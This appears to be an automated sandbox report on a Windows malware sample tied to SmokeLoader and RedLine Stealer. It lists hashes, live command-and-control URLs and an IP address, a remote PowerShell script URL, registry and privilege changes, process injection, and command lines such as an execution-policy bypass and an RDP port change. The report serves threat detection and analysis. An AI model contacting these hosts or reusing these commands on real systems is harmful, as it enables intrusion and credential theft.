Analysis
- max time kernel: 152s
- max time network: 149s
- platform: windows10_x64
- resource: win10-en-20211208
- submitted: 10-12-2021 08:50
Static task: static1
Behavioral task: behavioral1
- Sample: ecc95feeb482af01eb5ed90d3a003dc4fac3e1d0d6e4627f9497fe83f87a2070.exe
- Resource: win10-en-20211208
General
- Target: ecc95feeb482af01eb5ed90d3a003dc4fac3e1d0d6e4627f9497fe83f87a2070.exe
- Size: 218KB
- MD5: 329096f5fae6abed39a7d88c40544c0a
- SHA1: c47cecb7581b713d9c188f250792752d73b56d01
- SHA256: ecc95feeb482af01eb5ed90d3a003dc4fac3e1d0d6e4627f9497fe83f87a2070
- SHA512: 39a175130232ce0c4d0cd96112dcb641abadad39f6d7ac7e072be53a2a8c3e6a9a42233ee5cd81b8c2537c35ca5bb059b903fef572746ee9975d0d1e349e3b8a
Malware Config
Extracted
- https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Extracted
- Family: smokeloader
- Version: 2020
- C2:
  http://rcacademy.at/upload/
  http://e-lanpengeonline.com/upload/
  http://vjcmvz.cn/upload/
  http://galala.ru/upload/
  http://witra.ru/upload/
Extracted
- Family: redline
- C2: 195.133.47.114:38627
Signatures
- RedLine
  RedLine Stealer is a malware family written in C#, first appearing in early 2020.
- RedLine Payload (3 IoCs)
  Processes:
  resource | yara_rule
  C:\Users\Admin\AppData\Local\Temp\7904.exe | family_redline
  C:\Users\Admin\AppData\Local\Temp\7904.exe | family_redline
  behavioral1/memory/1228-133-0x0000000001210000-0x000000000127C000-memory.dmp | family_redline
- SmokeLoader
  Modular backdoor trojan in use since 2014.
- Grants admin privileges (1 TTPs)
  Uses net.exe to modify the user's privileges.
- Blocklisted process makes network request (9 IoCs)
  Processes:
  flow | pid | process
  92 | 3672 | powershell.exe
  94 | 3672 | powershell.exe
  95 | 3672 | powershell.exe
  96 | 3672 | powershell.exe
  99 | 3672 | powershell.exe
  101 | 3672 | powershell.exe
  103 | 3672 | powershell.exe
  105 | 3672 | powershell.exe
  107 | 3672 | powershell.exe
- Downloads MZ/PE file
- Executes dropped EXE (3 IoCs)
  Processes:
  pid | process
  3340 | 7904.exe
  1228 | 98A3.exe
  2272 | D4A3.exe
- Modifies RDP port number used by Windows (1 TTPs)
- Sets DLL path for service in the registry (2 TTPs)
- Processes:
  resource | yara_rule
  \Windows\Branding\mediasrv.png | upx
  \Windows\Branding\mediasvc.png | upx
- Deletes itself (1 IoCs)
  Processes:
  pid | process
  3040 | (process name not recorded)
- Loads dropped DLL (2 IoCs)
  Processes:
  pid | process
  2096 | (process name not recorded)
  2096 | (process name not recorded)
- Suspicious use of NtSetInformationThreadHideFromDebugger (1 IoCs)
  Processes:
  pid | process
  1228 | 98A3.exe
- Drops file in Program Files directory (4 IoCs)
  Processes:
  description | ioc | process
  File opened for modification | C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT | powershell.exe
  File opened for modification | C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI | powershell.exe
  File opened for modification | C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT | powershell.exe
  File opened for modification | C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI | powershell.exe
- Drops file in Windows directory (19 IoCs)
  Processes:
  description | ioc | process
  File created | C:\Windows\branding\mediasrv.png | powershell.exe
  File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_rfy4dlys.vyg.psm1 | powershell.exe
  File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI2C39.tmp | powershell.exe
  File opened for modification | C:\Windows\branding\mediasvc.png | powershell.exe
  File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_sxb3mk2z.r25.ps1 | powershell.exe
  File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat | powershell.exe
  File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe
  File opened for modification | C:\Windows\branding\Basebrd | powershell.exe
  File opened for modification | C:\Windows\branding\ShellBrd | powershell.exe
  File opened for modification | C:\Windows\branding\mediasrv.png | powershell.exe
  File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI2C3A.tmp | powershell.exe
  File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI2BDA.tmp | powershell.exe
  File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI2C29.tmp | powershell.exe
  File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI2C4B.tmp | powershell.exe
  File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | powershell.exe
  File created | C:\Windows\branding\mediasvc.png | powershell.exe
  File created | C:\Windows\branding\wupsvc.jpg | powershell.exe
  File opened for modification | C:\Windows\branding\wupsvc.jpg | powershell.exe
  File created | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP | powershell.exe
- Checks SCSI registry key(s) (3 TTPs, 3 IoCs)
  SCSI information is often read in order to detect sandboxing environments.
  Processes:
  description | ioc | process
  Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | ecc95feeb482af01eb5ed90d3a003dc4fac3e1d0d6e4627f9497fe83f87a2070.exe
  Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | ecc95feeb482af01eb5ed90d3a003dc4fac3e1d0d6e4627f9497fe83f87a2070.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | ecc95feeb482af01eb5ed90d3a003dc4fac3e1d0d6e4627f9497fe83f87a2070.exe
- Modifies data under HKEY_USERS (64 IoCs)
  Processes:
  description | ioc | process
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CRLs | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0 | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\@ivt = "1" | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges\ | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CTLs | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\57fd7ae31ab34c2c = ",33,HKCU,SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Extensible Cache," | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2 | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "My Computer [Protected Mode]" | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\DisplayName = "Trusted sites" | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | WMIC.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\CurrentLevel = "0" | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2 | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1200 = "3" | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet." | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\shell = "0" | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Icon = "inetcpl.cpl#00004480" | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1 | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableNegotiate = "1" | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Description = "Your computer" | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\file = "3" | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Icon = "inetcpl.cpl#00004480" | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ftp = "3" | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\CurrentLevel = "0" | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4 | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1400 = "1" | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data." | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "Computer [Protected Mode]" | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\e1be3f182420a0a0 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones," | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Flags = "219" | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags = "3" | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\DisplayName = "Local intranet" | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Flags = "219" | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1400 = "0" | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4 | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\LowIcon = "inetcpl.cpl#005426" | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyByPass = "0" | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\SelfHealCount = "1" | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "My Computer" | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3 | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CTLs | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\LowIcon = "inetcpl.cpl#005422" | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\ | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\PMDisplayName = "Trusted sites [Protected Mode]" | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Description = "Your computer" | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\CurrentLevel = "70912" | powershell.exe
- Modifies registry key (1 TTPs, 1 IoCs)
- Runs net.exe
- Script User-Agent (4 IoCs)
  Uses user-agent string associated with script host/environment.
  Processes:
  description | flow | ioc
  HTTP User-Agent header | 94 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  HTTP User-Agent header | 95 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  HTTP User-Agent header | 96 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  HTTP User-Agent header | 99 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
- Suspicious behavior: EnumeratesProcesses (64 IoCs)
  Processes:
  pid | process
  3920 | ecc95feeb482af01eb5ed90d3a003dc4fac3e1d0d6e4627f9497fe83f87a2070.exe
  3920 | ecc95feeb482af01eb5ed90d3a003dc4fac3e1d0d6e4627f9497fe83f87a2070.exe
  3040 | (process name not recorded; this pid accounts for the remaining 62 entries)
- Suspicious behavior: GetForegroundWindowSpam (1 IoCs)
  Processes:
  pid | process
  3040 | (process name not recorded)
- Suspicious behavior: LoadsDriver (2 IoCs)
  Processes:
  pid | process
  608 | (process name not recorded)
  608 | (process name not recorded)
- Suspicious behavior: MapViewOfSection (1 IoCs)
  Processes:
  pid | process
  3920 | ecc95feeb482af01eb5ed90d3a003dc4fac3e1d0d6e4627f9497fe83f87a2070.exe
- Suspicious use of AdjustPrivilegeToken (64 IoCs)
  Processes:
  description | pid | process
  Token: SeShutdownPrivilege | 3040 | (process name not recorded)
  Token: SeCreatePagefilePrivilege | 3040 | (process name not recorded)
  Token: SeShutdownPrivilege | 3040 | (process name not recorded)
  Token: SeCreatePagefilePrivilege | 3040 | (process name not recorded)
  Token: SeDebugPrivilege | 2080 | powershell.exe
  Token: SeDebugPrivilege | 4080 | powershell.exe
  Token: SeIncreaseQuotaPrivilege | 4080 | powershell.exe
  Token: SeSecurityPrivilege | 4080 | powershell.exe
  Token: SeTakeOwnershipPrivilege | 4080 | powershell.exe
  Token: SeLoadDriverPrivilege | 4080 | powershell.exe
  Token: SeSystemProfilePrivilege | 4080 | powershell.exe
  Token: SeSystemtimePrivilege | 4080 | powershell.exe
  Token: SeProfSingleProcessPrivilege | 4080 | powershell.exe
  Token: SeIncBasePriorityPrivilege | 4080 | powershell.exe
  Token: SeCreatePagefilePrivilege | 4080 | powershell.exe
  Token: SeBackupPrivilege | 4080 | powershell.exe
  Token: SeRestorePrivilege | 4080 | powershell.exe
  Token: SeShutdownPrivilege | 4080 | powershell.exe
  Token: SeDebugPrivilege | 4080 | powershell.exe
  Token: SeSystemEnvironmentPrivilege | 4080 | powershell.exe
  Token: SeRemoteShutdownPrivilege | 4080 | powershell.exe
  Token: SeUndockPrivilege | 4080 | powershell.exe
  Token: SeManageVolumePrivilege | 4080 | powershell.exe
  Token: 33 | 4080 | powershell.exe
  Token: 34 | 4080 | powershell.exe
  Token: 35 | 4080 | powershell.exe
  Token: 36 | 4080 | powershell.exe
  Token: SeDebugPrivilege | 2820 | powershell.exe
  Token: SeIncreaseQuotaPrivilege | 2820 | powershell.exe
  Token: SeSecurityPrivilege | 2820 | powershell.exe
  Token: SeTakeOwnershipPrivilege | 2820 | powershell.exe
  Token: SeLoadDriverPrivilege | 2820 | powershell.exe
  Token: SeSystemProfilePrivilege | 2820 | powershell.exe
  Token: SeSystemtimePrivilege | 2820 | powershell.exe
  Token: SeProfSingleProcessPrivilege | 2820 | powershell.exe
  Token: SeIncBasePriorityPrivilege | 2820 | powershell.exe
  Token: SeCreatePagefilePrivilege | 2820 | powershell.exe
  Token: SeBackupPrivilege | 2820 | powershell.exe
  Token: SeRestorePrivilege | 2820 | powershell.exe
  Token: SeShutdownPrivilege | 2820 | powershell.exe
  Token: SeDebugPrivilege | 2820 | powershell.exe
  Token: SeSystemEnvironmentPrivilege | 2820 | powershell.exe
  Token: SeRemoteShutdownPrivilege | 2820 | powershell.exe
  Token: SeUndockPrivilege | 2820 | powershell.exe
  Token: SeManageVolumePrivilege | 2820 | powershell.exe
  Token: 33 | 2820 | powershell.exe
  Token: 34 | 2820 | powershell.exe
  Token: 35 | 2820 | powershell.exe
  Token: 36 | 2820 | powershell.exe
  Token: SeDebugPrivilege | 3456 | powershell.exe
  Token: SeIncreaseQuotaPrivilege | 3456 | powershell.exe
  Token: SeSecurityPrivilege | 3456 | powershell.exe
  Token: SeTakeOwnershipPrivilege | 3456 | powershell.exe
  Token: SeLoadDriverPrivilege | 3456 | powershell.exe
  Token: SeSystemProfilePrivilege | 3456 | powershell.exe
  Token: SeSystemtimePrivilege | 3456 | powershell.exe
  Token: SeProfSingleProcessPrivilege | 3456 | powershell.exe
  Token: SeIncBasePriorityPrivilege | 3456 | powershell.exe
  Token: SeCreatePagefilePrivilege | 3456 | powershell.exe
  Token: SeBackupPrivilege | 3456 | powershell.exe
  Token: SeRestorePrivilege | 3456 | powershell.exe
  Token: SeShutdownPrivilege | 3456 | powershell.exe
  Token: SeDebugPrivilege | 3456 | powershell.exe
  Token: SeSystemEnvironmentPrivilege | 3456 | powershell.exe
- Suspicious use of FindShellTrayWindow (4 IoCs)
  Processes:
  pid | process
  3040 | (process name not recorded)
  3040 | (process name not recorded)
  3040 | (process name not recorded)
  3040 | (process name not recorded)
- Suspicious use of SendNotifyMessage (2 IoCs)
  Processes:
  pid | process
  3040 | (process name not recorded)
  3040 | (process name not recorded)
- Suspicious use of WriteProcessMemory (64 IoCs)
  Processes:
  description | pid | process | target process
  PID 3040 wrote to memory of 3340 | 3040 | (process name not recorded) | 7904.exe
  PID 3040 wrote to memory of 3340 | 3040 | (process name not recorded) | 7904.exe
  PID 3040 wrote to memory of 3340 | 3040 | (process name not recorded) | 7904.exe
  PID 3040 wrote to memory of 1228 | 3040 | (process name not recorded) | 98A3.exe
  PID 3040 wrote to memory of 1228 | 3040 | (process name not recorded) | 98A3.exe
  PID 3040 wrote to memory of 1228 | 3040 | (process name not recorded) | 98A3.exe
  PID 3040 wrote to memory of 2272 | 3040 | (process name not recorded) | D4A3.exe
  PID 3040 wrote to memory of 2272 | 3040 | (process name not recorded) | D4A3.exe
  PID 2272 wrote to memory of 2080 | 2272 | D4A3.exe | powershell.exe
  PID 2272 wrote to memory of 2080 | 2272 | D4A3.exe | powershell.exe
  PID 2080 wrote to memory of 3788 | 2080 | powershell.exe | csc.exe
  PID 2080 wrote to memory of 3788 | 2080 | powershell.exe | csc.exe
  PID 3788 wrote to memory of 352 | 3788 | csc.exe | cvtres.exe
  PID 3788 wrote to memory of 352 | 3788 | csc.exe | cvtres.exe
  PID 2080 wrote to memory of 2356 | 2080 | powershell.exe | csc.exe
  PID 2080 wrote to memory of 2356 | 2080 | powershell.exe | csc.exe
  PID 2356 wrote to memory of 2204 | 2356 | csc.exe | cvtres.exe
  PID 2356 wrote to memory of 2204 | 2356 | csc.exe | cvtres.exe
  PID 2080 wrote to memory of 4080 | 2080 | powershell.exe | powershell.exe
  PID 2080 wrote to memory of 4080 | 2080 | powershell.exe | powershell.exe
  PID 2080 wrote to memory of 2820 | 2080 | powershell.exe | powershell.exe
  PID 2080 wrote to memory of 2820 | 2080 | powershell.exe | powershell.exe
  PID 2080 wrote to memory of 3456 | 2080 | powershell.exe | powershell.exe
  PID 2080 wrote to memory of 3456 | 2080 | powershell.exe | powershell.exe
  PID 2080 wrote to memory of 1672 | 2080 | powershell.exe | reg.exe
  PID 2080 wrote to memory of 1672 | 2080 | powershell.exe | reg.exe
  PID 2080 wrote to memory of 2680 | 2080 | powershell.exe | reg.exe
  PID 2080 wrote to memory of 2680 | 2080 | powershell.exe | reg.exe
  PID 2080 wrote to memory of 1852 | 2080 | powershell.exe | reg.exe
  PID 2080 wrote to memory of 1852 | 2080 | powershell.exe | reg.exe
  PID 2080 wrote to memory of 2144 | 2080 | powershell.exe | net.exe
  PID 2080 wrote to memory of 2144 | 2080 | powershell.exe | net.exe
  PID 2144 wrote to memory of 2752 | 2144 | net.exe | net1.exe
  PID 2144 wrote to memory of 2752 | 2144 | net.exe | net1.exe
  PID 2080 wrote to memory of 1904 | 2080 | powershell.exe | cmd.exe
  PID 2080 wrote to memory of 1904 | 2080 | powershell.exe | cmd.exe
  PID 1904 wrote to memory of 796 | 1904 | cmd.exe | cmd.exe
  PID 1904 wrote to memory of 796 | 1904 | cmd.exe | cmd.exe
  PID 796 wrote to memory of 1236 | 796 | cmd.exe | net.exe
  PID 796 wrote to memory of 1236 | 796 | cmd.exe | net.exe
  PID 1236 wrote to memory of 2936 | 1236 | net.exe | net1.exe
  PID 1236 wrote to memory of 2936 | 1236 | net.exe | net1.exe
  PID 2080 wrote to memory of 348 | 2080 | powershell.exe | cmd.exe
  PID 2080 wrote to memory of 348 | 2080 | powershell.exe | cmd.exe
  PID 348 wrote to memory of 3076 | 348 | cmd.exe | cmd.exe
  PID 348 wrote to memory of 3076 | 348 | cmd.exe | cmd.exe
  PID 3076 wrote to memory of 1812 | 3076 | cmd.exe | net.exe
  PID 3076 wrote to memory of 1812 | 3076 | cmd.exe | net.exe
  PID 1812 wrote to memory of 1896 | 1812 | net.exe | net1.exe
  PID 1812 wrote to memory of 1896 | 1812 | net.exe | net1.exe
  PID 1220 wrote to memory of 2512 | 1220 | cmd.exe | net.exe
  PID 1220 wrote to memory of 2512 | 1220 | cmd.exe | net.exe
  PID 2512 wrote to memory of 896 | 2512 | net.exe | net1.exe
  PID 2512 wrote to memory of 896 | 2512 | net.exe | net1.exe
  PID 4080 wrote to memory of 2204 | 4080 | cmd.exe | net.exe
  PID 4080 wrote to memory of 2204 | 4080 | cmd.exe | net.exe
  PID 2204 wrote to memory of 3108 | 2204 | net.exe | net1.exe
  PID 2204 wrote to memory of 3108 | 2204 | net.exe | net1.exe
  PID 1912 wrote to memory of 3280 | 1912 | cmd.exe | net.exe
  PID 1912 wrote to memory of 3280 | 1912 | cmd.exe | net.exe
  PID 3280 wrote to memory of 3920 | 3280 | net.exe | net1.exe
  PID 3280 wrote to memory of 3920 | 3280 | net.exe | net1.exe
  PID 660 wrote to memory of 1480 | 660 | cmd.exe | net.exe
  PID 660 wrote to memory of 1480 | 660 | cmd.exe | net.exe
Processes (indentation shows the parent/child tree depth recorded by the sandbox)
- C:\Users\Admin\AppData\Local\Temp\ecc95feeb482af01eb5ed90d3a003dc4fac3e1d0d6e4627f9497fe83f87a2070.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\ecc95feeb482af01eb5ed90d3a003dc4fac3e1d0d6e4627f9497fe83f87a2070.exe"
  - Checks SCSI registry key(s)
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
- C:\Users\Admin\AppData\Local\Temp\7904.exe
  Command line: C:\Users\Admin\AppData\Local\Temp\7904.exe
  - Executes dropped EXE
- C:\Users\Admin\AppData\Local\Temp\98A3.exe
  Command line: C:\Users\Admin\AppData\Local\Temp\98A3.exe
  - Executes dropped EXE
  - Suspicious use of NtSetInformationThreadHideFromDebugger
- C:\Users\Admin\AppData\Local\Temp\D4A3.exe
  Command line: C:\Users\Admin\AppData\Local\Temp\D4A3.exe
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
    - Drops file in Windows directory
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      Command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jebw35gm\jebw35gm.cmdline"
      - Suspicious use of WriteProcessMemory
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEA5C.tmp" "c:\Users\Admin\AppData\Local\Temp\jebw35gm\CSCA34C6D16E06431187B19D3288333D34.TMP"
    - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      Command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\uhjglvzx\uhjglvzx.cmdline"
      - Suspicious use of WriteProcessMemory
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF009.tmp" "c:\Users\Admin\AppData\Local\Temp\uhjglvzx\CSC3ECE22E97D764CCA9FFEF0369F48FCA0.TMP"
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
      - Suspicious use of AdjustPrivilegeToken
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
      - Suspicious use of AdjustPrivilegeToken
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
      - Suspicious use of AdjustPrivilegeToken
    - C:\Windows\system32\reg.exe
      Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
    - C:\Windows\system32\reg.exe
